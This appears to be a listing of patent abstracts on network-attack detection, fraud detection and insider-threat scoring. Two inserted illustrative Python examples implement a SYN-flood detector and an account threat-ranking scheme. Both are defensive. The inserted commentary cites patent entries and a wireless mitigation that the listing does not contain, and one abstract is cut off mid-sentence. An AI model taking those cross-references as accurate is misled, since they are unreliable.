20130198839SYSTEMS AND METHODS FOR DETECTING AND PREVENTING FLOODING ATTACKS IN A NETWORK ENVIRONMENT - A method for processing network traffic data includes receiving a packet, and determining whether the packet is a previously dropped packet that is being retransmitted. A method for processing network traffic content includes receiving a plurality of headers, the plurality of headers having respective first field values, and determining whether the first field values of the respective headers form a first prescribed pattern. A method for processing network traffic content includes receiving a plurality of packets, and determining an existence of a flooding attack without tracking each of the plurality of packets with a SYN bit.08-01-2013
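The three flooding checks in the entry above, as an added example (not the patent's or any product's code): a packet is matched against a bounded memory of previously dropped packets to recognize a retransmission, a header field across consecutive packets is tested for a fixed pattern, and a SYN flood is detected from the share of bare SYNs in a sliding window rather than by tracking each SYN. The packet representation, the window size, the 0.8 share threshold and the drop-then-admit-on-retransmit policy are assumptions; the traffic is constructed.

```python
from collections import OrderedDict, deque


def packet_key(pkt):
    """Identity of a packet for retransmission matching: the TCP 4-tuple plus
    sequence number, which a real stack repeats when it retransmits."""
    return (pkt["src"], pkt["dst"], pkt["sport"], pkt["dport"], pkt["seq"])


def is_bare_syn(pkt):
    return "SYN" in pkt["flags"] and "ACK" not in pkt["flags"]


def fields_form_pattern(values, min_len=8):
    """True when a header field across consecutive packets is constant or
    advances by a fixed stride, the fingerprint of a packet generator rather
    than of independent hosts."""
    if len(values) < min_len:
        return False
    strides = {b - a for a, b in zip(values, values[1:])}
    return len(strides) == 1


class FloodDetector:
    def __init__(self, window=200, syn_share_threshold=0.8, max_dropped=4096):
        self.syn_flags = deque(maxlen=window)      # 1 for a bare SYN, else 0
        self.syn_share_threshold = syn_share_threshold
        self.dropped = OrderedDict()               # bounded memory of dropped packet keys
        self.max_dropped = max_dropped

    def record_drop(self, pkt):
        self.dropped[packet_key(pkt)] = True
        if len(self.dropped) > self.max_dropped:
            self.dropped.popitem(last=False)       # evict the oldest key

    def is_retransmit_of_dropped(self, pkt):
        return packet_key(pkt) in self.dropped

    def observe(self, pkt):
        """Feed every packet; True once the bare-SYN share of the window
        exceeds the threshold. Only the window is kept, no per-SYN state."""
        self.syn_flags.append(1 if is_bare_syn(pkt) else 0)
        if len(self.syn_flags) < self.syn_flags.maxlen:
            return False
        return sum(self.syn_flags) / len(self.syn_flags) > self.syn_share_threshold

    def admit(self, pkt):
        """Drop a first-seen bare SYN while flooding; admit it when the same
        packet comes back as a retransmission, which spoofed floods never do."""
        flooding = self.observe(pkt)
        if not flooding or not is_bare_syn(pkt):
            return True
        if self.is_retransmit_of_dropped(pkt):
            return True
        self.record_drop(pkt)
        return False


def handshake(client, port, seq):
    """Constructed normal TCP exchange: SYN, SYN-ACK, ACK, data."""
    srv = "10.0.0.1"
    return [
        {"src": client, "dst": srv, "sport": port, "dport": 80, "seq": seq, "flags": {"SYN"}},
        {"src": srv, "dst": client, "sport": 80, "dport": port, "seq": 1000, "flags": {"SYN", "ACK"}},
        {"src": client, "dst": srv, "sport": port, "dport": 80, "seq": seq + 1, "flags": {"ACK"}},
        {"src": client, "dst": srv, "sport": port, "dport": 80, "seq": seq + 1, "flags": {"PSH", "ACK"}},
    ]


def spoofed_syn(i):
    """Constructed flood packet: fresh spoofed source, never retransmitted."""
    return {"src": f"203.0.113.{i % 250}", "dst": "10.0.0.1", "sport": 1024 + i,
            "dport": 80, "seq": 5000 + 10 * i, "flags": {"SYN"}}
```

Legitimate clients pay one retransmission timeout during a flood, which is the same trade-off the retry-based mitigation for wireless networks above makes; the bounded drop memory is what keeps the defence itself from becoming a memory-exhaustion target.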
20120066763Insider Threat Correlation Tool - Systems and methods for calculating threat scores for individuals within an organization or domain are provided. Aspects of the invention relate to computer-implemented methods that form a predictive threat rating for user accounts. In one implementation, a first threat score representing a first time period may be calculated. The first threat score may be compared with aspects of the same user accounts for a second time period. Weighting schemes may be applied to certain activities, controls, and/or user accounts. Further aspects relate to apparatuses configured to execute methods for ranking individual user accounts. Certain embodiments may not block transmissions that violate predefined rules, however, indications of such improper transmission may be considered when constructing a threat rating. Blocked transmissions enforced upon a user account may also be received. Certain activity, such as accessing the internet, may be monitored for the presence of a security threat and/or an ethics threat.03-15-2012
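The scoring in both Insider Threat Correlation Tool entries (20120023576 and 20120066763), as one added example (not the patents' or any product's code): violations are quantified across control groups with weights per control, per activity and per account, blocked transmissions still count at reduced weight, scores for two periods are compared, and accounts are ranked by a predictive rating that adds a share of any rise. All weights, the blocked-transmission factor, the trend weight and the violation records are assumptions constructed for illustration.

```python
from collections import defaultdict

# Weighting schemes (assumptions chosen for illustration, not values from the patents).
CONTROL_WEIGHTS = {"dlp": 3.0, "email": 2.0, "web": 1.0}   # per control group, default 1.0
ACTIVITY_WEIGHTS = {"usb_copy": 2.0}                         # per activity, default 1.0
ACCOUNT_WEIGHTS = {"contractor1": 1.5}                       # per user account, default 1.0
BLOCKED_FACTOR = 0.5   # a blocked transmission still counts, at reduced weight

# Constructed violation records for two periods: (account, control_group, activity, blocked).
PERIOD_1 = [
    ("alice", "web", "blocked_site", False),
    ("bob", "dlp", "usb_copy", False),
    ("bob", "email", "external_attachment", True),
    ("contractor1", "web", "blocked_site", False),
]
PERIOD_2 = [
    ("alice", "web", "blocked_site", False),
    ("alice", "dlp", "usb_copy", False),
    ("bob", "web", "blocked_site", False),
    ("contractor1", "dlp", "usb_copy", True),
]


def threat_scores(events):
    """Score each account: sum of weighted violations across control groups,
    then scaled by the account weight."""
    scores = defaultdict(float)
    for account, group, activity, blocked in events:
        w = CONTROL_WEIGHTS.get(group, 1.0) * ACTIVITY_WEIGHTS.get(activity, 1.0)
        if blocked:
            w *= BLOCKED_FACTOR
        scores[account] += w
    return {a: s * ACCOUNT_WEIGHTS.get(a, 1.0) for a, s in scores.items()}


def compare_periods(previous, current):
    """Per account: (previous score, current score, change). Accounts absent
    from a period score 0 there."""
    accounts = set(previous) | set(current)
    return {a: (previous.get(a, 0.0), current.get(a, 0.0),
                current.get(a, 0.0) - previous.get(a, 0.0)) for a in accounts}


def rank_accounts(current, previous=None, trend_weight=0.5):
    """Predictive rating: current score plus a share of the increase since the
    previous period, highest first (ties broken by account name)."""
    previous = previous or {}
    rated = {}
    for account, score in current.items():
        rise = max(0.0, score - previous.get(account, 0.0))
        rated[account] = score + trend_weight * rise
    return sorted(rated.items(), key=lambda kv: (-kv[1], kv[0]))
```

Running it on the two constructed periods moves alice from the bottom of the ranking to the top: a single DLP violation involving removable media outweighs a period of low-weight web violations, and the rise between periods is itself a signal.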
20130205390NETWORK ASSISTED FRAUD DETECTION APPARATUS AND METHODS - Methods and apparatus for detecting fraudulent device operation. In one exemplary embodiment of the present disclosure, a device is issued a user access control client that is uniquely associated with a shared secret that is securely stored within the network and the access control client. Subsequent efforts to activate or deactivate the access control client require verification of the shared secret. Each change in state includes a change to the shared secret. Consequently, requests for a change to state which do not have the proper shared secret will be disregarded, and/or flagged as fraudulent.08-08-2013
20130205391Formal Analysis of the Quality and Conformance of Information Flow Downgraders - Mechanisms for evaluating downgrader code in application code with regard to one or more security guidelines are provided. Downgrader code in application code is identified, where the downgrader code is a portion of code in the application code that operates on an information flow of the application code to ensure confidentiality of information input to the downgrader code, in the output of the downgrader code. Processes of the downgrader code are evaluated against security guidelines to determine if the processes violate the security guidelines. A notification is generated in response to the evaluation indicating that the processes of the downgrader code violate the security guidelines. The notification is output to a computing device for consideration.08-08-2013
20120072984REGULATING ATOMIC MEMORY OPERATIONS TO PREVENT DENIAL OF SERVICE ATTACK - In one embodiment, the present invention includes a method for identifying a termination sequence for an atomic memory operation executed by a first thread, associating a timer with the first thread, and preventing the first thread from execution of a memory cluster operation after completion of the atomic memory operation until a prevention window has passed. This method may be executed by regulation logic associated with a memory execution unit of a processor, in some embodiments. Other embodiments are described and claimed.03-22-2012
20120072983SYSTEM AND METHOD FOR PRIVACY-ENHANCED CYBER DATA FUSION USING TEMPORAL-BEHAVIORAL AGGREGATION AND ANALYSIS - A method of determining, within a deployed environment over a data communication network, network threats and their associated behaviors. The method includes the steps of acquiring sensor data that identifies a specific contact, normalizing the acquired sensor data to generate transformed sensor data, deriving, for the specific contact from the transformed sensor data, a contact behavior feature vector for each of a plurality of time periods, determining, for the specific contact, scores associated with each of a plurality of classification modules to form a contact score vector, the contact score vector being independent of an identity of the specific contact, identifying a type of the specific contact based on the contact score vector, and determining a threat type, based on the contact behavioral profile and the contact score vector, when the specific contact is determined to be a threat in the identifying step.03-22-2012
20120072982DETECTING POTENTIAL FRAUDULENT ONLINE USER ACTIVITY - One or more techniques and/or systems are disclosed herein for identifying potentially fraudulent use of user generated content (UGC) for an online activity by a user. Server-based information and browser-based information associated with the user is identified and used to create a user signature. The user signature is associated with the UGC for the online activity in a cache-key. The cache-key is compared to a desired threshold for identifying potentially fraudulent use of the UGC for the online activity, where potential fraud may be detected if the cache key meets the desired threshold.03-22-2012
20120096547METHOD FOR DETECTING AN ATTEMPTED ATTACK, RECORDING MEDIUM, AND SECURITY PROCESSOR FOR SAID METHOD - This method in which an attempt to attack a security processor is detected by the security processor itself comprises: 04-19-2012
20120096546Edge server HTTP POST message processing - A CDN edge server process receives an HTTP message, takes a given action with respect to that message, and then forwards a modified version of the message to a target server, typically a server associated with a CDN customer. The process may include an associated intermediate processing agent (IPA) or a sub-processing thread to facilitate the given action. In one embodiment, the message is an HTTP POST, and the given action comprises the following: (i) recognizing the POST, (ii) removing given data from the POST, (iii) issuing an intermediate (or subordinate) request to another process (e.g., a third party server), passing the given data removed from the POST to the process, (iv) receiving a response to the intermediate request, (v) incorporating data received from or associated with the response into a new HTTP message, and (vi) forwarding the new HTTP message onto the target server. In this manner, the given data in the POST may be protected as the HTTP message “passes through” the edge server on its way from the client to the target (merchant) server. In an alternative embodiment, data extracted from the POST message is enhanced by passing the data to an externalized process and adding a derived value (such as a fraud risk score based on the data) back into the message.04-19-2012
20130212675DYNAMIC COMPUTER NETWORK WITH VARIABLE IDENTITY PARAMETERS - Method for communicating data in a computer network involves dynamically modifying at a first location in the computer network a plurality of true values. The true values correctly represent the plurality of identity parameters. These true values are transformed to false values, which incorrectly represent the identity parameters. Subsequently, the identity parameters are modified at a second location to transform the false values back to the true values. The position of the first and/or second locations varies dynamically as part of this process. A bridge transforms identity parameter values when communicating outside the network. Dynamic modification of the identity parameters occurs in accordance with a mission plan that can be modified without interrupting communication of data in the network.08-15-2013
20130212676MISSION MANAGEMENT FOR DYNAMIC COMPUTER NETWORKS - Method for communicating data in a computer network involves dynamically modifying at a first location in the computer network a plurality of true values. The true values correctly represent the plurality of identity parameters. These true values are transformed to false values, which incorrectly represent the identity parameters. Subsequently, the identity parameters are modified at a second location to transform the false values back to the true values. The position of the first and/or second locations varies dynamically as part of this process. A bridge transforms identity parameter values when communicating outside the network. Dynamic modification of the identity parameters occurs in accordance with a mission plan that can be modified without interrupting communication of data in the network.08-15-2013
20130212677Thwarting Attacks that involve Analyzing Hardware Sensor Output - A hardware sensor and a hardware user-input component are integrated in a portable electronic device. The hardware sensor is operable to produce hardware sensor output indicative of orientation or motion or both of the device within its environment. The hardware user-input component has multiple elements operable to accept user input through touch. A user-input driver and the device's operating system are jointly operable to detect touch events involving the elements. A software application stored in the device's memory is executable by the device's processor as a process. A sensor driver or the operating system or both are configured to control what hardware sensor output, if any, is receivable by the process. This control may thwart an attack based on analysis of the hardware sensor output, the attack designed to deduce what user input has been made via multiple elements of the hardware user-input component.08-15-2013
20130212678Altering Sampling Rate to Thwart Attacks that involve Analyzing Hardware Sensor Output - A hardware sensor and a hardware user-input component are integrated in a portable electronic device. The hardware sensor is operable to produce hardware sensor output indicative of orientation or motion or both of the device within its environment. The hardware user-input component has multiple elements operable to accept user input through touch. A user-input driver and the device's operating system are jointly operable to detect touch events involving the elements. A software application stored in the device's memory is executable by the device's processor as a process. A sensor driver or the operating system or both are configured to control what hardware sensor output, if any, is receivable by the process. This control may thwart an attack based on analysis of the hardware sensor output, the attack designed to deduce what user input has been made via multiple elements of the hardware user-input component.08-15-2013
20130212679PROACTIVE TEST-BASED DIFFERENTIATION METHOD AND SYSTEM TO MITIGATE LOW RATE DoS ATTACKS - A low rate DoS attack detection algorithm is used, which relies on a characteristic of the low rate DoS attack in introducing high rate traffic for short periods, and then uses a proactive test based differentiation technique to filter the attack packets. The proactive test defends against DDoS attacks and low rate DoS attacks which tend to ignore the normal operation of network protocols, but it also differentiates legitimate traffic from low rate DoS attack traffic instigated by botnets. It leverages the conformity of legitimate flows, which obey the network protocols. It also differentiates legitimate connections by checking their responses to the proactive tests, which include puzzles for distinguishing botnets from human users.08-15-2013